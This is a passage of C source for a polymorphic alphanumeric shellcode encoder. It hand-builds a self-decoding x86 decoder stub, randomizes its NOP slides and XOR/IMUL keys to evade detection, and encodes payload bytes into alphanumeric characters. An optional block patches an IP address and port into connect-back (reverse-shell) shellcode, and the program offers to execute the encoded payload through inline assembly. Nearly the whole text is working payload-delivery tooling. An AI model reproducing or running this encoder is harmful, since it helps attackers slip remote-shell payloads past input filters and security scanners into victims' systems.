(this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | /*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. 
| | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec 
esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. 
| | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. 
| | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). 
| | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 
= 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | 
decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | 
    *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0);

    *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder;
    *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder;
    *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder;

    *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),
                                                                          '\xFF',
                                                                          0);
    *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),
                                                                          '\xFF',
                                                                          1);
#ifdef CONNECT_BACK_SHELLCODE
    ip_address = ip_str_to_dw(IP_ADDRESS);
    if (ip_address == -1)
        exit(-1);

    //set shellcode with ip address and port for connect-back
    *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;
    *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);
    *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2;
#endif

    //set decoder with 'random' nop slides
    strncpy(decoder+offset_nop_slide1,
            shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),
            size_nop_slide1);
    strncpy(decoder+offset_nop_slide2,
            shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),
            size_nop_slide2);

    //set decoder with random initial key
    *(decoder+offset_imul_key) = get_random_alnum_value();
    printf("initial key=0x%2X - %s\n",
           (UCHAR)*(decoder+offset_imul_key),
           is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!");

    //set decoder with 'random' dword pushes for registers we won't use
    *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode();
    printf("push dword1=0x%2X - %s\n",
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD1),
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");
    *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode();
    printf("push dword2=0x%2X - %s\n",
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD2),
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");
    *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode();
    printf("push dword3=0x%2X - %s\n",
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD3),
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");
    *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode();
    printf("push dword4=0x%2X - %s\n",
           (UCHAR)*(decoder+OFFSET_PUSH_DWORD4),
           is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");

    //bugfix: this time after srand() :)
    xor_al1=get_random_alnum_value();
    xor_al2=get_random_alnum_value();
    *(decoder+OFFSET_XOR_AL1_A) = xor_al1;
    *(decoder+OFFSET_XOR_AL1_B) = xor_al1;
    *(decoder+OFFSET_XOR_AL2_A) = xor_al2;
    *(decoder+OFFSET_XOR_AL2_B) = xor_al2;

    memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD,
           randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)),
           SIZE_RANDOMIZED_DECODER_HEAD);

    //set first xor1 to random alnum value (this is the first byte of the encoded data)
    xor1 = get_random_alnum_value();
    printf("xor1=0x%2X - %s\n",
           (UCHAR)xor1,
           is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!");

RE_RUN:
    sprintf(alnum_shellcode, "%s",decoder);
    memset(temp_buf, 0, 3);
    for(i=0; i<size; i++)
    {
        // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte
        // third_byte is the next encoded original byte's first_byte
        // the first byte of the terminating key is the last byte's third_byte
        p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]); //get a list of second_byte and third_byte for first_byte
        if(!p_xor2_key)
            goto RE_RUN;
        p_xor2_key = choose_random_node(p_xor2_key); //choose a random combination
        key=p_xor2_key->key;
        xor2=p_xor2_key->xor2;
        temp_buf[0] = xor1;
        temp_buf[1] = xor2;
        strcat(alnum_shellcode, temp_buf); // append it to our decoder
        xor1=key;
        free_p_xor2_key(p_xor2_key); // free the list
    } //get next original_byte

    if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))
    {
        printf("error - terminating key found in encoded shellcode. running again to fix\n");
        goto RE_RUN;
    }

    *(UCHAR*)(alnum_shellcode+8) = key;                       // set the last key of the encoded data to be the first byte of the terminating string
    *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value();  // choose 3 random alnum bytes for the rest of the terminating string
    *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value();
    *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value();
    strncat(alnum_shellcode,                                  // append the terminating string to the decoder+encoded shellcode
            (UCHAR*)(alnum_shellcode+offset_terminating_key),
            4);

    //bugfix: handle case of esp pointing to shellcode
    if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp"))
    {
        // _asm{
        //     push esp;
        //     pop eax;
        //     xor al, 0x36;
        //     xor al, 0x30;
        // }
        p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6);
        memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6);
        memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1);
        p_alnum_shellcode[0] = 'T';
        p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax
        p_alnum_shellcode[2] = '4'; //       and using other xor values
        p_alnum_shellcode[3] = '6'; // <-- (x+6)
        p_alnum_shellcode[4] = '4';
        p_alnum_shellcode[5] = '0'; // <-- x
        p_alnum_shellcode[8] = get_push_register_instruction("eax");
        p_alnum_shellcode[9] = get_push_register_instruction("eax");
        size_decoder += 6;
    }

    printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder);
    printf("decoder length: %d\n%s\n",
           size_decoder,
           p_alnum_shellcode);

    printf("scanning alnum_shellcode for shellcode up to size bytes\n");
    found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size);
    if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg);
    else printf("shellcode not found encoded in alnum_shellcode.\n");

    if (str_is_alnum(alnum_shellcode))
    {
        printf("execute shellcode locally? (hit: y and press enter): ");
        if(tolower(getchar()) == 'y')
        {
            _asm
            {
                push p_alnum_shellcode;
                pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;
                //jump to head of decoder
                jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;
            }
        }
    }
    else
    {
        printf("error non-alphanumeric shellcode\n");
    }

    return 0;
}

BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3)
{
    UINT offset, i, found;
    for (i=found=offset=0; i<known_pattern_length; i++)
    {
        while(*(alnum_str+offset))
        {
            if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i])
            {
                offset+=2;
                found++;
                break;
            }
            else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i])
            {
                offset+=3;
                found++;
                break;
            }
            else
            {
                found=0;
                i=0;
                offset++;
            }
        }
    }
    if(found == known_pattern_length)
        return 1;
    else
        return 0;
}

BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3)
{
    UINT offset, i, found;
    for (i=found=offset=0; i<known_pattern_length; i++)
    {
        while(*(alnum_str+offset))
        {
            if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i])
            {
                offset+=2;
                found++;
                break;
            }
            else if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i])
            {
                offset+=3;
                found++;
                break;
            }
            else
            {
                found=0;
                i=0;
                offset++;
            }
        }
    }
    if(found == known_pattern_length)
        return 1;
    else
        return 0;
}

BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2)
{
    UINT offset, i, found;
    for (i=found=offset=0; i<known_pattern_length; i++)
    {
        while(*(alnum_str+offset))
        {
            if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i])
            {
                offset+=2;
                found++;
                break;
            }
            else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i])
            {
                offset+=3;
                found++;
                break;
            }
            else
            {
                found=0;
                i=0;
                offset++;
            }
        }
    }
    if(found == known_pattern_length)
        return 1;
    else
        return 0;
}

UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length)
{
    UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1);
    UCHAR *temp_buf = malloc(255);
    strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET));
    alnum[strlen(ALNUM_CHARSET)]=0;
    memset(temp_buf, 0, 255);

    //this is not for production, just a poc...
    while(*alnum)
    {
        if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1))
        {
            alnum--;
            strcat(temp_buf, "(buf[0]*'");
            temp_buf[strlen(temp_buf)] = *alnum;
            strcat(temp_buf, "')^buf[1]");
            return(temp_buf);
        }
    }
    alnum-=strlen(ALNUM_CHARSET);
    while(*alnum)
    {
        if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0))
        {
            alnum--;
            printf("key = 0x%2X ('%c')\n", *alnum, *alnum);
            return("found pattern using: (buf[1]*key)^buf[0]\n");
        }
    }

    if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1))
        return("(buf[0]*0x30)^buf[1]");
    else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0))
        return("(buf[1]*0x30)^buf[0]");
    else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1))
        return("(buf[0]*0x10)^buf[1]");
    else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0))
        return("(buf[1]*0x10)^buf[0]");
    else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2))
        return("(buf[0]*buf[1])^buf[2]");
    else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1))
        return("(buf[0]*buf[2])^buf[1]");
    else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0))
        return("(buf[1]*buf[2])^buf[0]");
    else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2))
        return("(buf[0]^buf[1])*buf[2]");
    else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1))
        return("(buf[0]^buf[2])*buf[1]");
    else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0))
        return("(buf[1]^buf[2])*buf[0]");
    else
        return "";
}

BOOL is_alnum(UCHAR c)
{
    char *alnum = ALNUM_CHARSET;
    char search_c[2] = "";
    search_c[0] = c;
    return((BOOL)strstr(alnum, search_c));
}

BOOL str_is_alnum(UCHAR *str)
{
    ULONG length;
    length = strlen(str);
    for(;length>0;length--)
    {
        if( !is_alnum(str[length-1]) )
            return 0;
    }
    return 1;
}

UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index)
{
    int xor_complement_1, xor_complement_2;
    UCHAR two_xor_complements[3];
    for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++)
    {
        if (is_alnum((UCHAR)xor_complement_1))
        {
            for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++)
            {
                if (is_alnum((UCHAR)xor_complement_2))
                {
                    if(byte == (xor ^ xor_complement_1 ^ xor_complement_2))
                    {
                        two_xor_complements[0] = (UCHAR)xor_complement_1;
                        two_xor_complements[1] = (UCHAR)xor_complement_2;
                    }
                }
            }
        }
    }
    if(index == 0 || index == 1)
        return two_xor_complements[index];
    else
        return (UCHAR)0;
}

BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key)
{
    return (BOOL) strstr(alnum_shellcode, terminating_key);
}

DWORD ip_str_to_dw(UCHAR *str)
{
    DWORD x[4];
    int dwIpAddress;
    if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN)
        return -1;
    sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]);
    x[3] = x[3] > 255 ? -1 : (x[3] <<= 24);
    x[2] = x[2] > 255 ? -1 : (x[2] <<= 16);
    x[1] = x[1] > 255 ? -1 : (x[1] <<= 8);
    x[0] = x[0] > 255 ? -1 : (x[0] <<= 0);
    dwIpAddress = x[0]+x[1]+x[2]+x[3];
    return dwIpAddress;
}

DWORD my_htonl(DWORD dw_in)
{
    DWORD dw_out;
    *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0);
    *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1);
    *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2);
    *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3);
    return dw_out;
}

void free_p_xor2_key(struct xor2_key *node)
{
    struct xor2_key *temp = 0;
    if(node)
    {
        temp = node->prev;
        while(node->next)
        {
            node=node->next;
            free(node->prev);
        }
        free(node);
    }
    if(temp)
    {
        while(temp->prev)
        {
            temp=temp->prev;
            free(temp->next);
        }
        free(temp);
    }
}

struct xor2_key *choose_random_node(struct xor2_key *head)
{
    int num_nodes = 1, selected_node, i;
    struct xor2_key* tail = head;
    struct xor2_key* pn = NULL ;
    if (!head || !head->key)
        return 0;
    while(tail->next)
    {
        tail = tail->next;
        num_nodes++;
    }
    selected_node = rand()%num_nodes;
    for(i=0; i<selected_node; i++)
        head = head->next;
    return head;
}

struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c)
{
    struct xor2_key *p_xor2_key, *p_xor2_key_head;
    char *alnum = ALNUM_CHARSET;
    UINT i=0, z=1, r=0, count=0;
    UCHAR xor2=0, x=0;
    p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key));
    p_xor2_key->prev = 0;
    p_xor2_key->next = 0;
    p_xor2_key->key = 0;
    p_xor2_key->xor2 = 0;
    for(i=0; alnum[i]; i++)
    {
        for(x=0; alnum[x];x++)
        {
            xor2 = alnum[x];
            if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c)
            {
                p_xor2_key->xor2 = xor2;
                p_xor2_key->key = alnum[i];
                p_xor2_key->next = malloc(sizeof(struct xor2_key));
                p_xor2_key->next->prev = p_xor2_key;
                p_xor2_key = p_xor2_key->next;
                p_xor2_key->key=0;
                p_xor2_key->xor2=0;
            }
        }
    }
    if(!p_xor2_key->key)
        p_xor2_key->next = 0;
    if (p_xor2_key->prev)
        p_xor2_key = p_xor2_key->prev;
    else
        return 0;
    free(p_xor2_key->next);
    p_xor2_key->next=0;
    return p_xor2_key_head;
}

UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null.
{
    UINT last, randomNum;
    UCHAR temporary;
    UCHAR *output = malloc(length);
    memcpy(output, str, length);
    for (last = length; last > 1; last--)
    {
        randomNum = rand( ) % last;
        temporary = output[randomNum];
        output[randomNum] = output[last-1];
        output[last-1] = temporary;
    }
    memcpy(str, output, length);
    return output;
} // taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm

